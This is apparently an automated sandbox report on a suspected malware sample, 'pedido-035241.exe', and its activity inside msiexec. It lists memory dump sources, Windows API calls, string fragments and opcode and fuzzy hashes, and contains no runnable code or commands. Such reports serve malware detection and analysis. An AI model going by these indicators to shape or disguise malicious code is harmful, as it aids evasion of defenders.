• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 3248276644-3081826266
• Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
• Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
• Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
• Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
APIs
• IsWindowVisible.USER32(?), ref: 0040550C
• CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
  • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                            • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                            • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                                                                                                                                                                            • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                            • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
APIs
• FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
• GlobalFree.KERNEL32(?), ref: 00403B42
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3081826266
• Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
• Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
• Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
• Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
APIs
• lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pedido-035241.exe,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
• CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pedido-035241.exe,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003), ref: 00405E38
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-224404859
• Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
• Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
• Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
• Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
• CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
• lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
• Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
• Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
• Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
Strings
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
• API String ID: 0-1487592376
• Opcode ID: ef2be9f14bc497be85ee4970e9fdd183e8fabe5fc5fab8c8348b44915666d12b
• Instruction ID: 3a62e47822e3809252033cde9e847d99102e7896f0e777568dcb19b60c974136
• Opcode Fuzzy Hash: ef2be9f14bc497be85ee4970e9fdd183e8fabe5fc5fab8c8348b44915666d12b
• Instruction Fuzzy Hash: 02A1D575E00218DFDB14DFA9D884A9DBBF2FF49310F1484AAE409AB365DB359881CF50
Strings
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
• API String ID: 0-1487592376
• Opcode ID: 613aeaa6b9057e648c8d7ad9cf0991aa40f4411b1f5070ce23ba877406b4f3a5
• Instruction ID: 981b6cf3c7292c996d367803e635f4de7d63bedb92202bcdc3c1c45c6f670526
• Opcode Fuzzy Hash: 613aeaa6b9057e648c8d7ad9cf0991aa40f4411b1f5070ce23ba877406b4f3a5
• Instruction Fuzzy Hash: 3D81B474E00218CFDB14DFA9D984A9DBBF2BF88304F54D0A9E809AB365DB349985CF10
Strings
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
• API String ID: 0-1487592376
• Opcode ID: 3e73b4ab8ced625089cf1af81f3bf7caaba19b6a0a5c7ff8792e8184b92c956a
• Instruction ID: 0a8ba491b192a3298d63cbcadb2d32d95db54b8775d5a098373bb42efefdc6ef
• Opcode Fuzzy Hash: 3e73b4ab8ced625089cf1af81f3bf7caaba19b6a0a5c7ff8792e8184b92c956a
• Instruction Fuzzy Hash: DC81A474E00219CFDB14DFAAD984A9DBBF2BF88300F14D4A9E449AB365DB749985CF10
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 84adf21498753415596d384c4b9bd042bfb96ff94b1c81ca5a9d9e84f11b600a
                                                                                                                                                                            • Instruction ID: c1a65927a74fd01ccee783e0f50f76ad4c7353f34cbab76ae3c09bfc11f18acf
                                                                                                                                                                            • Opcode Fuzzy Hash: 84adf21498753415596d384c4b9bd042bfb96ff94b1c81ca5a9d9e84f11b600a
                                                                                                                                                                            • Instruction Fuzzy Hash: 06819674E00218DFDB14DFA9D984A9DBBF2BF88310F14D4AAE419AB365DB349981CF50
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 0411324dd3ce7151076795e8f98474c90ed4da0b0e022ecc32ec30259bed2f29
                                                                                                                                                                            • Instruction ID: b32111bacb5de7130bce8c13d279ab5bec40bc4c1e57d8865a56b4293d5e8812
                                                                                                                                                                            • Opcode Fuzzy Hash: 0411324dd3ce7151076795e8f98474c90ed4da0b0e022ecc32ec30259bed2f29
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C81A474E00218DFDB14DFA9D984A9DBBF2BF88300F14D4AAE419AB365DB349985CF50
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 3472bf2e5d2ac78c4344a037083715ee11da37043d616aa7668569026060db45
                                                                                                                                                                            • Instruction ID: c586b1951a8162ad388eaf324fe2f74024aad36621043c687160dfa3b2f09da9
                                                                                                                                                                            • Opcode Fuzzy Hash: 3472bf2e5d2ac78c4344a037083715ee11da37043d616aa7668569026060db45
                                                                                                                                                                            • Instruction Fuzzy Hash: 7381B074E00218CFDB14DFAAD984A9DBBF2BF88300F14D4A9E419AB365DB749985CF11
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 4abe1a596469017b024cd1c5a975a6f0d8238aba3a27f979f27d594fdb4014b1
                                                                                                                                                                            • Instruction ID: cede41a2cd34e5cf94219cc72385eb9bced9323524272d0089897b41ffaaea5e
                                                                                                                                                                            • Opcode Fuzzy Hash: 4abe1a596469017b024cd1c5a975a6f0d8238aba3a27f979f27d594fdb4014b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 75819574E00218DFDB14DFA9D984A9DBBF2BF88300F14D0AAE459AB365DB349985CF50
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                            • API String ID: 0-1487592376
                                                                                                                                                                            • Opcode ID: 4e868d80ec1ddf1445c8d6c594ac70d5a3b31ec812542c5179eeadebdde404c0
                                                                                                                                                                            • Instruction ID: 655990488fe03ee18305db5a78fbcfb3c4c1cf978f8ad413bfc955020b6e67a1
                                                                                                                                                                            • Opcode Fuzzy Hash: 4e868d80ec1ddf1445c8d6c594ac70d5a3b31ec812542c5179eeadebdde404c0
                                                                                                                                                                            • Instruction Fuzzy Hash: E881A674E00218CFDB14DFA9D984A9DBBF2BF88300F14D0AAE419AB365DB349981CF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 814ee38a1125d45639dd8f15dc058c6b28b3829ed7325e12420d488aa6d5511d
                                                                                                                                                                            • Instruction ID: f7597c832fc8a07d4f08dd22af7e582d1d0a061d3c9028d4b8a559c8abf84033
                                                                                                                                                                            • Opcode Fuzzy Hash: 814ee38a1125d45639dd8f15dc058c6b28b3829ed7325e12420d488aa6d5511d
                                                                                                                                                                            • Instruction Fuzzy Hash: 2751B274E00208DFDB08DFAAD584A9DBBF2FF88310F209469E819AB364DB359945CF14
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9c4ed3ad44e96c759d4f775c694f0fde7bc70b5afee28cbae17b0667ac5d0b34
                                                                                                                                                                            • Instruction ID: 21941d0958108a920b76ce7cbfad6ceac291367ca472a0fbc02a5f6872936e44
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c4ed3ad44e96c759d4f775c694f0fde7bc70b5afee28cbae17b0667ac5d0b34
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A51A374E00208DFDB18DFAAD594A9DBBB2FF88310F24D469E819AB364DB359845CF14
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: =$$(!=$$((=$$8>L$$LR^q$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$p-=$
                                                                                                                                                                            • API String ID: 0-2403305848
                                                                                                                                                                            • Opcode ID: b6749460d7b3b746431619ee42d9be890649130f09bfdd0991df4a2a22f08a9c
                                                                                                                                                                            • Instruction ID: 4068b506a99231b9b5d1236d55187b59aa4b63dcaaa6bcd6c5ac6b995092ed4d
                                                                                                                                                                            • Opcode Fuzzy Hash: b6749460d7b3b746431619ee42d9be890649130f09bfdd0991df4a2a22f08a9c
                                                                                                                                                                            • Instruction Fuzzy Hash: 00522B74911219CFCB56DF68C984E8DBBB6FB88311F1055A5E80AAB354DF34AE85CF80
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: =$$(!=$$((=$$8>L$$LR^q$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$\v/$$p-=$
                                                                                                                                                                            • API String ID: 0-2403305848
                                                                                                                                                                            • Opcode ID: 5df6722c7f1ce8947668d249e245fb2ec2dfc1e6302ef6122688e269108e6c11
                                                                                                                                                                            • Instruction ID: d072905cadc632979d85331a72e88e6e959a585d069dd7963ae5d9406f9b0ac6
                                                                                                                                                                            • Opcode Fuzzy Hash: 5df6722c7f1ce8947668d249e245fb2ec2dfc1e6302ef6122688e269108e6c11
                                                                                                                                                                            • Instruction Fuzzy Hash: 6B522C74911219CFCB55DF68C984E8DBBB6FB88311F1055A5E80AAB354DF34AE85CF80
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                                                                            • API String ID: 0-4258043069
                                                                                                                                                                            • Opcode ID: cea33232be141690627624945f0460ff264899b33d0c989fccf1e271a7efb4a4
                                                                                                                                                                            • Instruction ID: 2af45df5577d32bf79d1b2b4ef7af7590865136ee579c8e94103f0ee89add797
                                                                                                                                                                            • Opcode Fuzzy Hash: cea33232be141690627624945f0460ff264899b33d0c989fccf1e271a7efb4a4
                                                                                                                                                                            • Instruction Fuzzy Hash: 4BB1CF307042558FDF169F39C898B6A7BEAEF98314F1545A9E846CB391CF38C842CB91
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID: ,bq$,bq
• API String ID: 0-2699258169
• Opcode ID: 4d536446b8ef71fd3f59233fb3db1d7af37d6665f75cca94b3eb7c1fb851a7a1
• Instruction ID: d73241c5a511880159fd0e8a1daedbbd26eb22243de8c8a301d17e317c5ac1ed
• Opcode Fuzzy Hash: 4d536446b8ef71fd3f59233fb3db1d7af37d6665f75cca94b3eb7c1fb851a7a1
• Instruction Fuzzy Hash: 51818CB4B105058FCF14CF69C888AAABBFAFF99314B1581A9D507EB365DB31E841CB50
Strings
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID: 36$
• API String ID: 0-1819539327
• Opcode ID: 6507cb1fd245e9a239320170db5036a596c6a6ccb633d5a82e3ec6ce2be08782
• Instruction ID: 4765fe93e5774c3d1c016d4e2e960e0c892455415abeaf1ac0f74d36fa57021b
• Opcode Fuzzy Hash: 6507cb1fd245e9a239320170db5036a596c6a6ccb633d5a82e3ec6ce2be08782
• Instruction Fuzzy Hash: 7B11E3317055118FCB198A2EC45852EBBAAFFD576531981E9E427DB360CF34DC02CB90
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5a9e0da56605835956848dc416cd04b6d03e8596ee827d5aef7452bd0a9dfe8
• Instruction ID: cbdf051d5e3bed1efdcc4a9d9b2ba92ad1df7a1231c1f628c20ab4e147c000d6
• Opcode Fuzzy Hash: d5a9e0da56605835956848dc416cd04b6d03e8596ee827d5aef7452bd0a9dfe8
• Instruction Fuzzy Hash: E212A7750212468FE3526B2AD2BC12ABA62FB1F773387AD46F50FE1554DB781048CA26
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de9fe6d29b718a39d2782e5bcd2498c2cc1dadee968ce2398e25b475dfa53f37
• Instruction ID: b45f7e91bdcc60f327aa45cd96111e0cf453e37ee22755cc1b0a17afb2bc9e43
• Opcode Fuzzy Hash: de9fe6d29b718a39d2782e5bcd2498c2cc1dadee968ce2398e25b475dfa53f37
• Instruction Fuzzy Hash: 7B12A7750212468FA3527F2AD2BC12EBA62FB1F773387AD46F50FE1554DB781048CA26
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2cebb7cd56a5ab9d81b23b46a93eae42c3d0645d27c4053e3934277f454af894
• Instruction ID: 914a6e4b79c42022bc53e1069451c23fbbd0df5cc9dc68b7972d0f68348d857b
• Opcode Fuzzy Hash: 2cebb7cd56a5ab9d81b23b46a93eae42c3d0645d27c4053e3934277f454af894
• Instruction Fuzzy Hash: C8518374E11218DFDB54DFA9D98499DBBF2FF89300F248569E809AB364DB30A905CF50
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c1a2b230e4f9e3e6c84fc1f38c2c98778f0c0974997d9fee37e711b622cae9d
• Instruction ID: 62465041c00b1528315d8d34450a71477b792c5f3e9eb9bd3e580c08dd045698
• Opcode Fuzzy Hash: 6c1a2b230e4f9e3e6c84fc1f38c2c98778f0c0974997d9fee37e711b622cae9d
• Instruction Fuzzy Hash: F751BE74D01218DFDB15DFA4C994AADBBB2FF48304F208569D80ABB354DB399986CF41
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2e6f35868a238ce34c73259c59807fb4e9118356ca859dc07a7e59cf7df443a8
• Instruction ID: 6615691cebf4d6538b8719cd48575a6a09e861d31f2acf91c5fd736ead6ee0fd
• Opcode Fuzzy Hash: 2e6f35868a238ce34c73259c59807fb4e9118356ca859dc07a7e59cf7df443a8
• Instruction Fuzzy Hash: 2351AF74E11208CFCB09DFA9D58499DBBF6FF89314B209469E809AB324DB35AD46CF50
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f7362e12b2e15ce9b042a46e15bd4a56a0a1ef6fb0e7ae838f57d9aaa8133b4a
• Instruction ID: 7c29f5e9870090e907aeb068992a31de2f2eff91ce35b4d0ee4d5e2a8b39f5fb
• Opcode Fuzzy Hash: f7362e12b2e15ce9b042a46e15bd4a56a0a1ef6fb0e7ae838f57d9aaa8133b4a
• Instruction Fuzzy Hash: 2E51B174E11208CFCB09DFA9D58499DBBF6FF89314B209069E809AB324DB35AD46CF50
Memory Dump Source
• Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
